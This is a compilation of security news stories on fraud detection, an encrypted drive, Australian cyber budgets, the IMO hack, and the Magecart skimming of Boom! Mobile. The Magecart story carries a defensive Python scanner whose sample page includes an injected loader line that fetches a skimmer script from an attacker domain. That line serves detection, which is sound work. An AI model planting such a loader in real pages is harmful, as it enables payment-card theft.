More stories


    F5 Networks intros new fraud detection engine based on Shape Security acquisition

    F5 Networks on Tuesday introduced Shape AI Fraud Engine (SAFE), a new SaaS offering that promises to eliminate fraudulent online transactions that can sometimes bypass other security and fraud detection controls.

    Leveraging technology from its $1 billion acquisition of Shape Security earlier this year, F5’s SAFE service evaluates online transactions via AI in order to understand user intent and block potential fraud before it occurs. The product marks F5’s first real push into the fraud market since acquiring Shape Security, the company said.
    Following its acquisition of Shape Security, F5 has integrated Shape’s capabilities into its portfolio of application security services, with F5 serving as a traffic flow insertion point for Shape’s online fraud and abuse prevention solutions. F5’s app security services specialize in protecting applications across multi-cloud environments.
“The need for innovation in fraud prevention becomes more urgent when you factor in the accelerated shift to online channels driven by the current global health situation,” said Sumit Agarwal, VP of analytic products at F5, and co-founder of Shape. “We’re seeing fraudsters launch increasingly sophisticated attacks that take advantage of COVID-driven shifts and overall economic distress.”
Earlier this year F5 announced a series of new multi-cloud application security services, including one that brought its Web Application Firewall (WAF) technology to the NGINX platform following the company’s acquisition of NGINX.
The acquisitions of Shape Security and NGINX and recent product launches have allowed F5 to reframe its approach to security with a focus on four key areas: application layer security, trusted application access, application infrastructure security and intelligent threat services. The Shape AI Fraud Engine fits into this approach and gives F5 an entry point into the fraud prevention market. The service is available now.


    Apricorn releases industry’s largest hardware-encrypted storage drive

    External hard drives are a great backup and portable storage solution, but if they are used to store sensitive data, they can quickly become a huge security headache.
While there is no shortage of external drives that ship with software encryption, these are far from ideal in situations where security is a must.
Not only do you need the encryption/decryption software installed on every device you want to connect the drive to, you also have to hope that a version exists for the platform you are using. You will probably be in luck on the latest version of Windows or macOS, but on an older OS release, something less mainstream such as Linux or Android, or an embedded system, a software-based solution is likely to leave you stuck.
    This is why I like hardware solutions such as the Apricorn Aegis Padlock DT drive.

    I reviewed an Aegis Padlock DT drive a couple of years ago, and I still use one for long-term storage of sensitive data. Back then, the upper storage limit on the drive was 12TB.
12TB is a lot, but Apricorn realized that some people have greater storage needs and has expanded the line to include an 18TB model.
    Apart from featuring the largest encrypted external USB storage capacity in its class, the Aegis Padlock DT drives offer nine capacities of secure storage, ranging from 2TB to 18TB. The drive features 256-bit AES XTS hardware-based encryption and has a polymer-coated wear-resistant on-board keypad for quick PIN authentication.
The drive’s firmware is also locked to prevent tampering, which Apricorn says makes its products resistant to attacks such as BadUSB.
On the connectivity front, the Aegis Padlock DT uses USB 3.2 Gen 1 (USB 3.0) transfer speeds. All data is encrypted on the fly as it is written to the drive, and both the PINs and the data remain encrypted when the drive is at rest.
The drive is also packed with security features, including brute-force protection, unattended auto-lock, separate admin and user modes, and even a self-destruct mode (the drive doesn’t explode; it simply returns to factory state and looks as if it has never been set up).
“The Padlock DT FIPS are secure, easy to use drives for organizations that want to ensure their sensitive data is secure at all times. As ransomware continues to be one of the most dominant cyber threats organizations face, businesses must back up their data and store it disconnected from the network to enable fast recovery in the event of a cyber-attack whilst encrypting it to comply with data protection legislation,” said Jon Fielding, Managing Director, EMEA Apricorn. “Adding the 18TB drive to our product set provides businesses increased storage capabilities and the assurance that should they be targeted, they can thwart ransomware attempts with a secure encrypted data backup,” Fielding added.
The Apricorn Aegis Padlock DT is a solid, reliable, well-constructed storage solution for those looking for robust, secure storage.


    Boom! Mobile falls prey to Magecart card-skimming attack

    A mobile network operator has fallen victim to a Magecart campaign designed to steal consumer financial data. 

Malwarebytes researchers said on Monday that one of the latest organizations targeted by a Magecart group is Boom! Mobile, whose US website has been compromised and, at the time of writing, is actively being used to harvest shopper information.
The researchers said that Boom!, a mobile operator that promotes transparency and ease of use as its main selling points, has so far not responded to efforts to get the Magecart infection removed.
    Magecart is an umbrella term describing credit-card skimmer attacks and numerous cyberthreat groups that now specialize in this area. Typically, attacks are performed by exploiting a vulnerability in a website domain — including back-end content management systems (CMS) — in order to load JavaScript-based scripts able to skim data.
    In order to avoid detection for as long as possible, threat actors may limit the injection of skimmer code to payment portal pages. 
    Once card data has been stolen and whisked away to an attacker-controlled command-and-control server (C2), this information can be sold on in bulk, used to create clone cards, or to conduct fraudulent purchases.  
    Previous victims of Magecart attacks include Ticketmaster and British Airways.
    Malwarebytes says that in Oklahoma-based Boom! Mobile’s case, one of the cybersecurity firm’s crawlers found a one-line code injection containing a Base64 encoded URL leading to an external JavaScript library.
Once decoded, the URL points to paypal-debit[.]com/cdn/ga.js, a script that passes itself off as a Google Analytics element.
    “We quickly recognize this code as a credit card skimmer that checks for input fields and then exfiltrates the data to the criminals,” the researchers said. 
The skimmer itself, however, is far from quiet. Rather than silently collecting a large batch of data and sending it in one go, it exfiltrates data every time it detects a change in the fields on the page, such as those used to enter card details. The team noted that each leak shows up as a separate GET request, which makes the exfiltration visible to anyone watching outbound traffic from the checkout page.
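The injection pattern described above, a base64-encoded URL hidden in a one-line inline script that pulls in an external skimmer, is something a site owner can check for without a commercial crawler. The Python scanner below is an added example and is not code from Malwarebytes or from the Boom! Mobile site: it collects every script load on a page, decodes base64 literals found in inline scripts, and flags any script host that is not on an allowlist. The sample page, the allowlist hosts and the exact injected line are constructed for the example; only the skimmer domain comes from the report.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this storefront is expected to load script from (hypothetical allowlist for the example).
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com", "cdn.shop.example"}

# Runs of base64 alphabet long enough to hold a URL; an injected loader typically feeds one to atob().
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


class ScriptCollector(HTMLParser):
    """Collect external script src values and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def decode_hidden_urls(script_text):
    """Return URLs recovered from base64 literals embedded in inline script text."""
    urls = []
    for match in B64_RE.finditer(script_text):
        token = match.group(0).rstrip("=")
        padded = token + "=" * (-len(token) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # identifier-like runs that are not really base64
        if decoded.startswith(("http://", "https://", "//")):
            urls.append(decoded)
    return urls


def suspicious_script_loads(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Flag script hosts outside the allowlist, whether in a src attribute or hidden behind base64."""
    collector = ScriptCollector()
    collector.feed(html)
    candidates = [(url, "src") for url in collector.external]
    for body in collector.inline:
        candidates += [(url, "inline-base64") for url in decode_hidden_urls(body)]
    findings = []
    for url, via in candidates:
        host = urlparse(url).hostname  # None for same-origin relative paths, which are not flagged
        if host and host not in allowed_hosts:
            findings.append({"host": host, "url": url, "via": via})
    return findings


# Constructed sample page: the injected line is a stand-in for the one-liner Malwarebytes described,
# not the real injection; only the skimmer domain comes from the report.
INJECTED_URL = "https://paypal-debit.com/cdn/ga.js"
SAMPLE_PAGE = f"""<html><head>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="/static/checkout.js"></script>
<script>var s=document.createElement('script');s.src=atob('{base64.b64encode(INJECTED_URL.encode()).decode()}');document.head.appendChild(s);</script>
</head><body><form id="payment"><input name="cc_number"></form></body></html>"""

if __name__ == "__main__":
    for finding in suspicious_script_loads(SAMPLE_PAGE):
        print(f"{finding['via']}: {finding['host']}  <- {finding['url']}")
```

Run against the sample page, the two legitimate loads pass (one is allowlisted, one is a same-origin path) and the base64-hidden loader is reported with its decoded host. The same allowlist, expressed as a Content-Security-Policy `script-src` directive, would have stopped the browser from fetching the skimmer even after the injection landed.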
    It is possible that the website’s compromise was due to the use of an old version of PHP that is no longer supported. 
The group believed to be responsible is Fullz House, which has previously been traced to Magecart attacks using the same malicious domain and code. “Fullz” is slang for data dumps containing a victim’s “full” set of personally identifiable information (PII) and payment card data.
    RiskIQ published a report on Fullz House, also tracked as Magecart Group 4, in 2019. The group has diversified into both phishing and card-skimming campaigns but overlaps in domain and IP infrastructure have allowed researchers to connect the dots. In September, new fraudulent domains were registered by the group.
    Malwarebytes has reported the active infection to the mobile service provider via live chat and email, but as of now, the company has not responded. 
    “Their website is still compromised and online shoppers are still at risk,” the team added. 
    ZDNet has reached out to Boom! Mobile for comment and will update when we hear back. 



    Budget 2020: Commonwealth Ombudsman scores AU$1.6m to oversee encryption laws

    If there is one word to sum up the Australian Budget of 2020-21, it is pre-announced.

    As far back as June, it’s been possible to see the framework that the government has used for its cyber announcements, at the time announcing AU$1.35 billion for its Cyber Enhanced Situational Awareness and Response (CESAR) package.
By August, another AU$320 million was added via the 2020 Cyber Security Strategy, taking the total to AU$1.7 billion, the figure being thrown about with maddening glee in the papers.
One of the few notable new items was the fulfilment of the Commonwealth Ombudsman’s request for more funding.
    “The government will provide AU$1.6 million in 2020-21 (including $0.9 million in capital funding) to the Office of the Commonwealth Ombudsman to ensure that it can effectively oversee the use of the new Telecommunications and other Legislation Amendment (Assistance and Access) Act 2018 by law enforcement agencies,” the Budget papers stated.
    “This measure will be offset by redirecting funding from the Department of Home Affairs.”
The irony is that Ombudsman Michael Manthorpe was looking for funding to handle the proposed Telecommunications Legislation Amendment (International Production Orders, or IPO) Bill 2020, which would allow Australia to work towards a bilateral agreement with the United States to implement the US CLOUD Act.
    Entering into a bilateral CLOUD Act agreement would enable Australian law enforcement to serve domestic orders for communications data needed to combat serious crime directly on US-based companies, and vice versa.  
    “If passed, the IPO Bill will make it easier for law enforcement agencies to obtain certain electronic information under proposed and future bilateral or multilateral agreements, when compared to current mutual legal assistance arrangements,” Manthorpe wrote at the time.
“On this basis, I anticipate that not only will the number of inspections my office is required to perform increase, but so too will the volume of electronic information accessed by Australian law enforcement agencies which my staff will need to assess.”
    Elsewhere in the Budget papers, AU$12.7 million has been set aside for an Australia-India cyber and critical technology partnership as part of a AU$62 million plan across four years to “support the Comprehensive Strategic Partnership with India”, which includes AU$19.5 million to focus on science, technology, and innovation. This announcement was made on June 4.
    The government also said it would spend AU$222 million over four years with AU$22.3 million ongoing to improve and modernise the IT systems and business practices related to export regulations in the agricultural sector. The money will go towards “simplifying interactions between farmers and exporters and the Department of Agriculture, Water and the Environment”, integrating systems to lower “regulatory burden”, as well as “mitigating export system outages and improving the cybersecurity of information”.
    AU$4.9 million will also be spent across two years to “build, consolidate, and strengthen cybersecurity capability in the energy sector”, which is in addition to the AU$4.7 million that will be spent in 2020-21 on the Australian Sports Foundation to help the fundraising of community sports clubs and boost the network and cyber functions of the organisation.
    Across the Cyber Security Strategy, AU$21 million will be spent in 2020-21, AU$43 million will follow in 2021-22, a further AU$37.3 million will appear in 2022-23, and AU$48 million is allocated for 2023-24. This brings the noted allocations to just over AU$149 million across the forward estimates.
    Of that, the Australian Signals Directorate will lose AU$10.7 million in 2020-21, followed by AU$10.8 million of funding related to the strategy in 2021-22, and AU$11 million for 2022-23. No funding is allocated for 2023-24.
    Across the four years, the Australian Federal Police will get almost AU$90 million, Home Affairs will get AU$54.2 million related to the strategy, and the Department of Industry, Science, Energy, and Resources will get AU$37.7 million.
    The Budget papers stated the $1.4 billion in funding for CESAR will be spent over a decade, and that it would be offset by pulling funding from elsewhere within Defence. 
    The papers also stated the Office of the eSafety Commissioner would receive AU$39.4 million over three years to “continue its work keeping Australian families safe”.
    “The additional funding will enable the Office of the eSafety Commissioner to respond to a sustained increase in demand for its existing programs and fulfil additional functions and responsibilities, including overseeing a new adult cyber abuse takedown scheme under the new Online Safety Act.”



    UN maritime agency says it was hacked


    The United Nations International Maritime Organization (UN IMO) disclosed a security breach over the weekend that the agency categorized as a “sophisticated cyber-attack” against its IT systems.
    The incident was discovered on Thursday and impacted the IMO public website and other web-based services, the UN agency said in a press release.
    Email systems, its virtual conferencing platform, along with other internal and external collaboration platforms, were unaffected, an IMO spokesperson said.
    Affected systems were taken down and then restored by Friday, October 2.
    The agency said the attack “overcame robust security measures” it had in place to protect its IT systems.
    “The IMO Headquarters file servers are located in the UK, with extensive backup systems in Geneva. The backup and restore system is regularly tested,” the agency said.
    “Following the attack, the Secretariat shut down key systems to prevent further damage from the attack. The Secretariat is working with international security experts to restore systems as soon as possible, to identify the source of the attack, and further enhance security systems to prevent recurrence.”
An IMO spokesperson acknowledged a request for comment from ZDNet but did not return an email seeking more details about the nature of the cyberattack.
It is unclear whether the IMO was hit by ransomware, a website defacement, or a watering hole attack, in which attackers plant malicious code on a website its intended victims are known to visit, here IMO members and visitors, in an attempt to infect them with malware.
The IMO is the UN organization that issues international guidance on shipping, passenger ships, maritime security, and maritime environmental protection. Because of its central role in international rule-making, it is a highly influential body that often sets policy for the entire maritime field.


    Singapore banks to develop digital trade registry for better transparency

    Banks in Singapore are teaming up to develop a digital trade finance registry that will serve as a central database from which they can access records of trade transactions. To be built on blockchain technology, the platform aims to drive greater transparency and reduce the risk of trade fraud, including duplicate financing. 
    Led by DBS Bank and Standard Chartered, the initiative is supported by 12 other banks including ABN AMRO, ANZ, Deutsche Bank, ICICI, OCBC, and UOB. Singapore-based blockchain technology startup DLTLedgers has been roped in to develop the platform, said DBS in a statement Tuesday.

DBS said it and Standard Chartered had worked for three months to establish the proof-of-concept for the digital registry, which they hope will enhance lending practices and improve transparency in commodity trade.
    “[It] aims to be an industry utility by serving as a secure central database for the banking industry to access records of trade transactions financed across banks in Singapore. This mitigates against duplicate financing from different bank lenders for the same trade inventory, leading to greater trust and confidence among banks and traders alike,” DBS said.
The initiative is supported by Enterprise Singapore and endorsed by The Association of Banks in Singapore (ABS).
    Without a digital registry, banks currently need to conduct validations within a single customer entity or across their own banking network, with no view of what other banks have financed or undertaken payment obligations against. The digital registry would plug this gap by facilitating collaboration across market players and government agencies, DBS said. 
    Enterprise Singapore’s assistant CEO Satvinder Singh noted that the development of the “neutral and secure platform” would ease the flow of information between banks and boost their risk management capabilities, driving greater confidence in the finance and trade sectors. 
    After the proof-of-concept was completed, DBS said it would work with Standard Chartered and ABS to deploy the digital registry in Singapore before expanding it at a later stage to cover “major trade corridors” globally.
    The ABS would also manage the digital registry, supported by a committee comprising ABS Council member banks. In addition, three working groups of banks would be set up to jointly lead the governance, technical development, and business scope of the project. All banks would be invited to join the registry as members. 


    Australian telco security coordinator concerned at network virtualisation plans

    Australia’s Communications Access Coordinator (CAC) is concerned by the level of understanding within the nation’s telcos about the risk that network virtualisation can introduce.
    The CAC role was created under Australia’s Telecommunications Sector Security Reforms (TSSR) and is charged with assessing whether changes made by telcos to their networks expose them to unauthorised access or interference, and if that is the case, it issues recommendations for changes.
    In the Telecommunications Sector Security Reforms — Report for 2019-20 tabled in Parliament on Tuesday, a number of Australian telcos notified the CAC that they were automating their network configurations.
    “These changes featured high levels of technical complexity and equally complex supply chains. In several instances the CAC had concerns about the notifying carrier’s understanding and appreciation of the risks presented by the proposed change, particularly the risks associated with complex multi-vendor/subcontractor, multi-jurisdiction supply chains,” the report said.
    “The CAC also had concerns in several instances with carriers misunderstanding the level of exposure they had in proposing to outsource or ‘hybridise’ their infrastructure environment.
    “In each of these instances during the reporting period the CAC informed the relevant carriers of the concerns and suggested measures that they could implement to ensure they could continue to comply with their security obligation while proceeding with the change.”
    The report also said the CAC received multiple notices of a carrier proposing to use a managed service provider, where the CAC thought the carrier would lose its ability to “maintain competent supervision of, and effective control over, telecommunications networks and facilities owned or operated by the carrier”.
The CAC was concerned by the lack of supervision over the provider’s activities, the lack of consideration given to the location from which the provider would serve the telco, and the “limited assurance” that the carrier had “effective control” over the network or facilities being provided. In these instances, the CAC recommended changes.
Over the course of the year to June 30, the CAC responded with 24 “some risk” notices to telcos and six “no risk” notices, and had two notices outstanding. The Minister for Home Affairs did not issue any directions over the year.
    The TSSR laws were used in 2018 to ban Huawei and ZTE from Australia’s 5G networks.
    “The Department [of Home Affairs] has continued to work closely with telecommunications operators to ensure they understand their TSSR obligations with respect to deploying and operating 5G networks and services,” the report said.
    “The department has also worked with non-5G mobile network operators to understand and manage the potential sustainment risks associated with the United States’ export restrictions affecting certain telecommunications infrastructure vendors.”
    The report said CAC would be able to respond quicker if telcos provided sufficient information.
    The TSSR was passed by Parliament in September 2017, after the Parliamentary Joint Committee on Intelligence and Security recommended a number of changes, including an annual reporting mechanism to Parliament.
    Also tabled on Tuesday was a report on the operation of the Critical Infrastructure Act for the year to June 30.
    Passed in March 2018, the Act created a register of critical infrastructure assets which included asset ownership, access, and control.
    Over the year, the nation’s electricity, water, gas, and port sectors reported 118 notifications to Home Affairs, which consisted of 109 changes, and nine new additions to the register.
    None of the ministerial directions, information gathering powers, enforcement powers, nor any private declarations were issued.
    The recent 2020 Cyber Security Strategy said the federal government was looking to impose an enforceable “positive security obligation” on designated critical infrastructure operators through amendments to the Act.


    Five bar and cafe owners arrested in France for running no-log WiFi networks


    In one of the weirdest arrests of the year, at least five bar and cafe managers from the French city of Grenoble were taken into custody last week for running open WiFi networks at their establishments and not keeping logs of past connected users.
    The bar and cafe owners were arrested for allegedly breaking a 14-year-old French law that dictates that all internet service providers must keep logs on all their users for at least one year.
    According to local media reports [1, 2, 3], the bar and cafe owners claimed they were not aware that such a law even existed, let alone that it applied to them as they had not received notifications from their union, which usually sends alerts of industry-wide legal requirements.
Nonetheless, French media pointed out that the law’s text does not apply only to internet service providers (ISPs) in the broad sense of the word, meaning telecommunications providers, but to any “persons” who provide internet access, whether free of charge or via password-protected networks.
    The bar and cafe owners were eventually released after questioning.
    According to French law number 2006-64, they now risk up to one year in prison, a personal fine of up to €75,000, and a business fine of up to €375,000.
    Connection logging is a feature supported on most commercial routers and has been added for this specific reason, as countries around the world began introducing data logging laws for their local ISPs.
Law enforcement agencies often rely on these logs to track down malicious behavior or details about suspects who use public WiFi networks to commit crimes.